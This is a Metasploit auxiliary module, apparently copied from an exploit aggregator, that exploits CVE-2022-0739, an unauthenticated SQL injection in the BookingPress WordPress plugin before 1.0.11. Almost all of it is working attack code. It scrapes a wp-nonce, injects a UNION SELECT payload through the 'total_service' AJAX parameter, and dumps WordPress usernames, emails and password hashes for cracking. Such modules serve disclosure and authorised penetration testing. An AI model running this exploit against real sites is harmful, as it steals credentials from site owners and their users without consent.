## https://sploitus.com/exploit?id=PACKETSTORM:180692
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::SQLi
prepend Msf::Exploit::Remote::AutoCheck
NONCE_NOT_FOUND_ERROR_MSG = 'Unable to get wp-nonce as an unauthenticated user'.freeze
GET_SQLI_OBJECT_FAILED_ERROR_MSG = 'Unable to successfully retrieve an SQLi object'.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Wordpress BookingPress bookingpress_front_get_category_services SQLi',
'Description' => %q{
The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied data
in the `total_service` parameter of the `bookingpress_front_get_category_services` AJAX action
(available to unauthenticated users), prior to using it in a dynamically constructed SQL query.
As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive
data from the backend database such as usernames and password hashes.
This module uses this vulnerability to dump the list of WordPress users and their associated
email addresses and password hashes for cracking offline.
},
'Author' => [
'cydave', # Of cyllective. Discovery of bug.
'destr4ct', # PoC Code for exploiting the bug.
'jheysel-r7' # Metasploit module
],
'References' => [
[ 'URL', 'https://github.com/destr4ct/CVE-2022-0739'],
[ 'WPVDB', '388cd42d-b61a-42a4-8604-99b812db2357'],
[ 'CVE', '2022-0739']
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2022-02-28',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([
OptString.new('TARGETURI', [ true, 'The URL of the BookingPress appointment booking page', '/bookingpress/' ])
])
end
def check
@nonce = get_user_nonce
return Exploit::CheckCode::Unknown(NONCE_NOT_FOUND_ERROR_MSG) if @nonce == NONCE_NOT_FOUND_ERROR_MSG
@sqli = get_sqli_object
return Exploit::CheckCode::Unknown(GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
return Exploit::CheckCode::Vulnerable if @sqli.test_vulnerable
Exploit::CheckCode::Safe
end
def generate_vars_post(sqli)
{
'action' => 'bookingpress_front_get_category_services', # Vulnerable AJAX action
'_wpnonce' => @nonce,
'category_id' => 1,
'total_service' => "#{rand(100..10000)}#{sqli}"
}
end
def get_sqli_object
create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('/wp-admin/admin-ajax.php'),
'vars_post' =>
generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- -")
})
if res && res.code == 200
json_doc = res.get_json_document
if json_doc.blank? || json_doc[0].blank?
print_error('Could not parse the JSON response returned from the SQLi attempt!')
return GET_SQLI_OBJECT_FAILED_ERROR_MSG
end
json_parsed_doc = json_doc[0]['bookingpress_service_id']
if json_parsed_doc.blank?
print_error('Was able to parse the JSON response but no bookingpress_service_id field was found!')
return GET_SQLI_OBJECT_FAILED_ERROR_MSG
end
json_parsed_doc
elsif res
print_error("Unexpected response code encountered when conducting the SQLi attempt: #{res.code}")
return GET_SQLI_OBJECT_FAILED_ERROR_MSG
else
print_error('No response from SQLi attempt')
return GET_SQLI_OBJECT_FAILED_ERROR_MSG
end
end
end
def get_user_nonce
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['TARGETURI'])
})
return NONCE_NOT_FOUND_ERROR_MSG unless res&.body&.match("_wpnonce:'(\\w+)'\\s*};")
::Regexp.last_match(1)
end
def run
@nonce ||= get_user_nonce
fail_with(Failure::UnexpectedReply, NONCE_NOT_FOUND_ERROR_MSG) if @nonce == NONCE_NOT_FOUND_ERROR_MSG
@sqli ||= get_sqli_object
fail_with(Failure::UnexpectedReply, GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG
creds_table = Rex::Text::Table.new(
'Header' => 'Wordpress User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Email', 'Hash']
)
print_status('Extracting credential information')
users = @sqli.dump_table_fields('wp_users', %w[user_login user_email user_pass])
users.each do |(username, email, hash)|
creds_table << [username, email, hash]
create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: username,
private_type: :nonreplayable_hash,
jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),
private_data: hash,
service_name: 'WordPress BookingPress Plugin',
address: datastore['RHOSTS'],
port: datastore['RPORT'],
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED,
email: email
})
end
print_line creds_table.to_s
end
end